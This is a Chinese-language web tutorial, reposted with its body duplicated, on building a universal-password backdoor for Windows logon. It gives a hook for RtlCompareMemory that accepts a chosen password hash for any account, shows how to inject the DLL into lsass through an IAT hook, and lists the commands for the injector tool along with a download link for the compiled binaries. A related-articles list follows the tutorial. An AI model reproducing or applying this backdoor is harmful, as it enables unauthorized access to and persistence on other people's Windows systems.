教你利用IAT hook實現(xiàn)windows通用密碼后門
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:03:55 作者:佚名
我要評論
先不管是不是真的有,我們可以自己實現(xiàn)一個這樣的后門。
先簡單介紹一下windows登陸過程中的一些過程。
winlogon進程用gina.dll獲取用戶名和密碼,通過LPC傳給lsass進程。
然后lsass進程調(diào)用默認認證包msv1_0.dll來驗證密碼的對錯。
而msv1_0則從SAM中獲得用戶
先不管是不是真的有,我們可以自己實現(xiàn)一個這樣的后門。
先簡單介紹一下windows登陸過程中的一些過程。
winlogon進程用gina.dll獲取用戶名和密碼,通過LPC傳給lsass進程。
然后lsass進程調(diào)用默認認證包msv1_0.dll來驗證密碼的對錯。
而msv1_0則從SAM中獲得用戶的信息,包括密碼的哈希。
要實現(xiàn)這樣一個后門,首先要找到登陸驗證這一系列函數(shù)的最底層的一個,然后在那里做手腳。
很明顯,這個最底層的函數(shù)在lsass進程的msv1_0.dll模塊中。
lsass調(diào)用msv1_0.dll的是這個函數(shù):
代碼:
msv1_0!LsaApLogonUserEx2
LsaApLogonUserEx2 in MSDN
那我們就應(yīng)該調(diào)試lsass進程然后在msv1_0!LsaApLogonUserEx2下斷點。
這里我使用windbg和vmware并利用dbgsrv進行遠程的用戶態(tài)調(diào)試。
http://blogs.msdn.com/spatdsg/archiv…27/507265.aspx
上面Spat在blog中介紹了如何用dbgsrv調(diào)試(Debugging LSA via dbgsrv.exe)。
在虛擬機(被調(diào)試端)運行
代碼:
dbgsrv.exe -t tcp:port=1234,password=spat
然后在調(diào)試端運行
代碼:
windbg.exe -premote tcp:server=192.168.1.102,port=1234,password=spat
然后選擇附加lsass進程。
但這里我們不能登陸之后再運行dbgsrv,那樣dbgsrv就被關(guān)掉了,所以我利用windows的任務(wù)計劃讓dbgsrv開機就運行起來。
虛擬機啟動后,dbgsrv也起來了,然后用windbg連上并附上lsass進程。
在下了斷點msv1_0!LsaApLogonUserEx2后,讓lsass繼續(xù)運行。
然后登陸,果然windbg斷下來了。
這個時候給大家介紹windbg的一個強勁的命令,那就是wt,它能所有的記錄函數(shù)調(diào)用關(guān)系,一直記錄到ret,具體用法請看windbg幫助。
我猜wt是單步運行,所以很慢。
但是wt輸出的文本很多,太難看了,于是我寫了個python腳本把wt的輸出轉(zhuǎn)成一個TreeCtrl
大家注意看我鼠標點上的那個函數(shù):ntdll!RtlCompareMemory。
經(jīng)過調(diào)試我發(fā)現(xiàn)這個函數(shù)就是我要找的那個“最底層的函數(shù)”。
代碼:
SIZE_T
RtlCompareMemory(
IN CONST VOID *Source1,
IN CONST VOID *Source2,
IN SIZE_T Length
);
RtlCompareMemory in MSDN
并且我還發(fā)現(xiàn)了驗證密碼時這個函數(shù)3個參數(shù)的細節(jié),
Source1是從SAM中取出的用戶密碼的Unicode形式的md4哈希,
Source2是用戶輸入的密碼的Unicode形式的md4哈希,
Length總是16,因為md4的哈希就是16位。
很容易我寫出了下面這個替代的函數(shù):
代碼:
int WINAPI MyRtlCompareMemory(void *a, void *b, int len) {
if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
return 16;
return pRtlCompareMemory(a, b, len);
}
其中pRtlCompareMemory是全局變量,是真正的RtlCompareMemory的地址,PASSWD_HASH是通用密碼的哈希。
使用MyRtlCompareMemory來hook掉RtlCompareMemory,就可以實現(xiàn)預定的功能了。
如果要比較的是16位的,并且第二段內(nèi)存與我們的哈希一樣那就直接放行,不管第一段內(nèi)存是什么。
也許有朋友會問,你這是hook了msv1_0模塊內(nèi)所有調(diào)用RtlCompareMemory的地方,不會出錯嗎?
放心吧,哪有那么巧,要比較的是16位的而且第二段內(nèi)存又和我們的哈希一模一樣?
要hook這個函數(shù)有很多方法,
我選擇了最懶的一種,IAT hook dll注入。
于是我寫了一個小工具來注入dll:DllInject
代碼:
C:\Documents and Settings\cly\桌面\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all
passdoor.dll是要注入到lsass進程的dll,這個dll在DllMain中實現(xiàn)了IAT hook,很土的技術(shù)了,就不貼代碼了,網(wǎng)上一搜一籮筐。
然后我又寫了一個小工具:pdconfig
其實就是改passdoor.dll中的哈希,以免要換密碼是又要重新編譯passdoor.dll。
使用方法:
代碼:
InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll
卸載方法:
代碼:
InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll
http://clyfish.googlepages.com/passdoor.rar
這里是本文中相關(guān)工具的源碼以及編譯好的二進制文件。
其中包括InjectDll.exe, passdoor.dll和pdconfig.exe,所有代碼均使用MingW gcc4.2.1編譯。
先簡單介紹一下windows登陸過程中的一些過程。
winlogon進程用gina.dll獲取用戶名和密碼,通過LPC傳給lsass進程。
然后lsass進程調(diào)用默認認證包msv1_0.dll來驗證密碼的對錯。
而msv1_0則從SAM中獲得用戶的信息,包括密碼的哈希。
要實現(xiàn)這樣一個后門,首先要找到登陸驗證這一系列函數(shù)的最底層的一個,然后在那里做手腳。
很明顯,這個最底層的函數(shù)在lsass進程的msv1_0.dll模塊中。
lsass調(diào)用msv1_0.dll的是這個函數(shù):
代碼:
msv1_0!LsaApLogonUserEx2
LsaApLogonUserEx2 in MSDN
那我們就應(yīng)該調(diào)試lsass進程然后在msv1_0!LsaApLogonUserEx2下斷點。
這里我使用windbg和vmware并利用dbgsrv進行遠程的用戶態(tài)調(diào)試。
http://blogs.msdn.com/spatdsg/archiv…27/507265.aspx
上面Spat在blog中介紹了如何用dbgsrv調(diào)試(Debugging LSA via dbgsrv.exe)。
在虛擬機(被調(diào)試端)運行
代碼:
dbgsrv.exe -t tcp:port=1234,password=spat
然后在調(diào)試端運行
代碼:
windbg.exe -premote tcp:server=192.168.1.102,port=1234,password=spat
然后選擇附加lsass進程。
但這里我們不能登陸之后再運行dbgsrv,那樣dbgsrv就被關(guān)掉了,所以我利用windows的任務(wù)計劃讓dbgsrv開機就運行起來。
虛擬機啟動后,dbgsrv也起來了,然后用windbg連上并附上lsass進程。
在下了斷點msv1_0!LsaApLogonUserEx2后,讓lsass繼續(xù)運行。
然后登陸,果然windbg斷下來了。
這個時候給大家介紹windbg的一個強勁的命令,那就是wt,它能所有的記錄函數(shù)調(diào)用關(guān)系,一直記錄到ret,具體用法請看windbg幫助。
我猜wt是單步運行,所以很慢。
但是wt輸出的文本很多,太難看了,于是我寫了個python腳本把wt的輸出轉(zhuǎn)成一個TreeCtrl
大家注意看我鼠標點上的那個函數(shù):ntdll!RtlCompareMemory。
經(jīng)過調(diào)試我發(fā)現(xiàn)這個函數(shù)就是我要找的那個“最底層的函數(shù)”。
代碼:
SIZE_T
RtlCompareMemory(
IN CONST VOID *Source1,
IN CONST VOID *Source2,
IN SIZE_T Length
);
RtlCompareMemory in MSDN
并且我還發(fā)現(xiàn)了驗證密碼時這個函數(shù)3個參數(shù)的細節(jié),
Source1是從SAM中取出的用戶密碼的Unicode形式的md4哈希,
Source2是用戶輸入的密碼的Unicode形式的md4哈希,
Length總是16,因為md4的哈希就是16位。
很容易我寫出了下面這個替代的函數(shù):
代碼:
int WINAPI MyRtlCompareMemory(void *a, void *b, int len) {
if (len == 16 && pRtlCompareMemory(PASSWD_HASH, b, len) == 16)
return 16;
return pRtlCompareMemory(a, b, len);
}
其中pRtlCompareMemory是全局變量,是真正的RtlCompareMemory的地址,PASSWD_HASH是通用密碼的哈希。
使用MyRtlCompareMemory來hook掉RtlCompareMemory,就可以實現(xiàn)預定的功能了。
如果要比較的是16位的,并且第二段內(nèi)存與我們的哈希一樣那就直接放行,不管第一段內(nèi)存是什么。
也許有朋友會問,你這是hook了msv1_0模塊內(nèi)所有調(diào)用RtlCompareMemory的地方,不會出錯嗎?
放心吧,哪有那么巧,要比較的是16位的而且第二段內(nèi)存又和我們的哈希一模一樣?
要hook這個函數(shù)有很多方法,
我選擇了最懶的一種,IAT hook dll注入。
于是我寫了一個小工具來注入dll:DllInject
代碼:
C:\Documents and Settings\cly\桌面\bin>InjectDll.exe
InjectDll v0.1
Inject/UnInject a dll file to a process, by cly, at 20080522
Usage:
InjectDll.exe (-i | -u | -U) pid filename
-i: Inject
-u: UnInject once
-U: UnInject at all
passdoor.dll是要注入到lsass進程的dll,這個dll在DllMain中實現(xiàn)了IAT hook,很土的技術(shù)了,就不貼代碼了,網(wǎng)上一搜一籮筐。
然后我又寫了一個小工具:pdconfig
其實就是改passdoor.dll中的哈希,以免要換密碼是又要重新編譯passdoor.dll。
使用方法:
代碼:
InjectDll.exe -i pid_of_lsass full_path_of_passdoor.dll
卸載方法:
代碼:
InjectDll.exe -U pid_of_lsass full_path_of_passdoor.dll
http://clyfish.googlepages.com/passdoor.rar
這里是本文中相關(guān)工具的源碼以及編譯好的二進制文件。
其中包括InjectDll.exe, passdoor.dll和pdconfig.exe,所有代碼均使用MingW gcc4.2.1編譯。
相關(guān)文章
- “CMOS密碼”就是通常所說的“開機密碼”,主要是為了防止別人使用自已的計算機,設(shè)置的一個屏障2023-08-01

QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04
QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時會采用 Windows 自帶的 BitLocker 加密工具對電腦磁盤分區(qū)進行加密。但有些人加密后就會忘記自己設(shè)置的密碼從而導致在安裝其它軟2020-11-25
防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細介紹了如何才能防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-06-27
徹底防止計算機泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計算機泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價值,2017-06-27- 最近有電腦用戶反應(yīng)量子計算機可以破解下載的所有的加密算法嗎?其實也不是不可以,下面虛擬就為大家講解買臺量子計算機,如何分分鐘破解加密算法2016-09-26
怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁后門。黑客通常會通過它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19- 本文討論了針對Linux系統(tǒng)全盤加密的冷啟動攻擊,大家都認為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28
防止泄露公司機密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對日漸嚴重的內(nèi)部泄密事件,我們?nèi)绾问刈o企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個企業(yè)領(lǐng)導面前的一大問題。其實,針對內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17






